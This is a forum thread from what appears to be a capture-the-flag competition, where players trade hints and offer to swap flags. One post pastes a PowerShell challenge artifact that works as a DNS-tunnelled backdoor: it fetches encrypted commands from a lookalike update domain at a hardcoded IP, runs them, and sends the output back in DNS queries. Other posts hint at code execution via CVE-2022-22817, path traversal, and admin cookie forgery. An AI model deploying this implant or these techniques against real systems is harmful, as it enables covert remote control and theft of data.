Posts: 42 Threads: 0 Joined: N/A Anyone done any Hardware challenges?? Posts: 41 Threads: 0 Joined: N/A In Automation what to do ,
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
$aesManaged
}
function Create-AesKey() {
$aesManaged = Create-AesManagedObject $key $IV
[System.Convert]::ToBase64String($aesManaged.Key)
}
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
[System.BitConverter]::ToString($fullData).replace("-","")
}
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
$aesManaged.Dispose()
[System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}
filter parts($query) { $t = $_; 0..[math]::floor($t.length / $query) | % { $t.substring($query * $_, [math]::min($query, $t.length - $query * $_)) }}
$key = "a1E4MUtycWswTmtrMHdqdg=="
$out = Resolve-DnsName -type TXT -DnsOnly windowsliveupdater.com -Server 147.182.172.189|Select-Object -Property Strings;
for ($num = 0 ; $num -le $out.Length-2; $num++){
$encryptedString = $out[$num].Strings[0]
$backToPlainText = Decrypt-String $key $encryptedString
$output = iex $backToPlainText;$pr = Encrypt-String $key $output|parts 32
Resolve-DnsName -type A -DnsOnly start.windowsliveupdater.com -Server 147.182.172.189
for ($ans = 0; $ans -lt $pr.length-1; $ans++){
$domain = -join($pr[$ans],".windowsliveupdater.com")
Resolve-DnsName -type A -DnsOnly $domain -Server 147.182.172.189
}
Resolve-DnsName -type A -DnsOnly end.windowsliveupdater.com -Server 147.182.172.189
}
found this code , is this it?? Posts: 24 Threads: 0 Joined: N/A (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: (May 15, 2022, 05:08 PM)fa23fsed23 Wrote: cis hard for me, anyone have hint ? ofc its related to imagemath.eval but exploitation vector is unknown for me
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
(May 15, 2022, 02:03 AM)RustNood34 Wrote: (May 14, 2022, 06:49 PM)Spakey Wrote: (May 14, 2022, 05:24 PM)fa23fsed23 Wrote: on Mutation Lab you have to use
CVE-2021-23631
what is the path to flag.txt? I repeated the ../ several times and nothing
you ever find the path? I'm stuck at the same point
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it. check dotenv related staff Posts: 41 Threads: 0 Joined: N/A (May 16, 2022, 09:16 AM)xemyll Wrote: (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: (May 15, 2022, 05:08 PM)fa23fsed23 Wrote: cis hard for me, anyone have hint ? ofc its related to imagemath.eval but exploitation vector is unknown for me
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
(May 15, 2022, 02:03 AM)RustNood34 Wrote: (May 14, 2022, 06:49 PM)Spakey Wrote: what is the path to flag.txt? I repeated the ../ several times and nothing
you ever find the path? I'm stuck at the same point
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
check dotenv related staff But how to exploit it , can u share a writeup Posts: 24 Threads: 0 Joined: N/A (May 16, 2022, 10:05 AM)testing Wrote: (May 16, 2022, 09:16 AM)xemyll Wrote: (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: (May 15, 2022, 05:08 PM)fa23fsed23 Wrote: cis hard for me, anyone have hint ? ofc its related to imagemath.eval but exploitation vector is unknown for me
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
(May 15, 2022, 02:03 AM)RustNood34 Wrote: you ever find the path? I'm stuck at the same point
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
check dotenv related staff
But how to exploit it , can u share a writeup I will do after event, sorry ) Posts: 43 Threads: 0 Joined: N/A (May 16, 2022, 09:16 AM)xemyll Wrote: (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: (May 15, 2022, 05:08 PM)fa23fsed23 Wrote: cis hard for me, anyone have hint ? ofc its related to imagemath.eval but exploitation vector is unknown for me
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
(May 15, 2022, 02:03 AM)RustNood34 Wrote: (May 14, 2022, 06:49 PM)Spakey Wrote: what is the path to flag.txt? I repeated the ../ several times and nothing
you ever find the path? I'm stuck at the same point
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
check dotenv related staff do we use the secret key to create the session.sig? Beening poking around looking for the flag but doesn't seem to be readable by the current web user.. thought probably the way forward is forging admin's cookie. Posts: 24 Threads: 0 Joined: N/A (May 16, 2022, 11:11 AM)just4htb1337 Wrote: (May 16, 2022, 09:16 AM)xemyll Wrote: (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: (May 15, 2022, 05:08 PM)fa23fsed23 Wrote: cis hard for me, anyone have hint ? ofc its related to imagemath.eval but exploitation vector is unknown for me
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
(May 15, 2022, 02:03 AM)RustNood34 Wrote: you ever find the path? I'm stuck at the same point
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
check dotenv related staff
do we use the secret key to create the session.sig? Beening poking around looking for the flag but doesn't seem to be readable by the current web user.. thought probably the way forward is forging admin's cookie. yes, we do. read /app/routes/index.js Posts: 41 Threads: 0 Joined: N/A (May 16, 2022, 11:20 AM)xemyll Wrote: (May 16, 2022, 11:11 AM)just4htb1337 Wrote: (May 16, 2022, 09:16 AM)xemyll Wrote: (May 15, 2022, 09:54 PM)RustNood34 Wrote: (May 15, 2022, 05:53 PM)xemyll Wrote: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
first read /app/index.js
It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
check dotenv related staff
do we use the secret key to create the session.sig? Beening poking around looking for the flag but doesn't seem to be readable by the current web user.. thought probably the way forward is forging admin's cookie.
yes, we do. read /app/routes/index.js Admist Us ? Posts: 3 Threads: 0 Joined: N/A Anyone for hardware challenges? Willing to trade other flags :) Posts: 4 Threads: 0 Joined: N/A (May 16, 2022, 12:04 PM)arbitron Wrote: Anyone for hardware challenges? Willing to trade other flags :) Ping me
(May 14, 2022, 10:37 PM)Internetdreams Wrote: got all pwn and all hardware DM please |
